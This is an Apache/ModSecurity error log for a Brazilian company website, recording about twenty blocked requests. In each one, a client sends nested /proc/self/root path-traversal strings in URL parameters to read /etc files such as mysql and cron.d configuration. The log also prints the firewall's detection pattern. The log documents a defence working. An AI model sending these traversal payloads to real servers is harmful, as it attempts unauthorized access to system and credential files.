[Fri Mar 20 06:30:38.017143 2026] [:error] [pid 9818:tid 140411725141760] [client 74.7.243.128:39456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Tvl1pVZ5mVmJwsFMeKQAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:39.307278 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.243.128:39470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Tv_qxLDW4GITHUkTTMAAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:41.712646 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:33294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TweoXxyEfFpUF8f9wKAAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:42.885769 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.241.31:48652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TwvXLqtnMIWvjpaKIUQAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:30:44.249336 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.241.31:48668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TxPXLqtnMIWvjpaKIUwAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:46.683472 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.241.31:48670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TxvXLqtnMIWvjpaKIWwAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:30:47.987045 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.241.31:55720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TxzJ3M9BSuKP7CAYFlAAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:30:49.357779 2026] [:error] [pid 11642:tid 140411548894976] [client 74.7.241.31:55726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Tybninkcc-iUj5ApMmwAAA5c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:50.912281 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.243.128:33308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TyhCii7xarUs8iHZWRgAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:52.184723 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.243.128:35340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TzDJ3M9BSuKP7CAYFlQAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:53.575087 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.243.128:35356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Tzbninkcc-iUj5ApMnQAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:54.295710 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.241.31:55742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TzvqxLDW4GITHUkTTNwAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:54.866977 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:35360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TzhCii7xarUs8iHZWSAAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:56.187842 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:35364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T0PqxLDW4GITHUkTTOQAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:57.347071 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.243.128:35378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T0fqxLDW4GITHUkTTPgAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:58.674790 2026] [:error] [pid 11642:tid 140411716749056] [client 74.7.243.128:35388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T0rninkcc-iUj5ApMoQAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:59.949660 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.241.31:55752] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T0wF0L0L-SsrnPo5V9gAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:59.955426 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:50304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T0_XLqtnMIWvjpaKIbwAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:01.219132 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:50310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T1da6ubjKNq_cu4bA5wAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:02.767422 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:50320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T1vqxLDW4GITHUkTTRAAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:03.022262 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:50320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T1_qxLDW4GITHUkTTRQAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:03.412959 2026] [mime_magic:error] [pid 31215:tid 140411674785536] (70014)End of file found: [client 57.141.18.123:56144] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
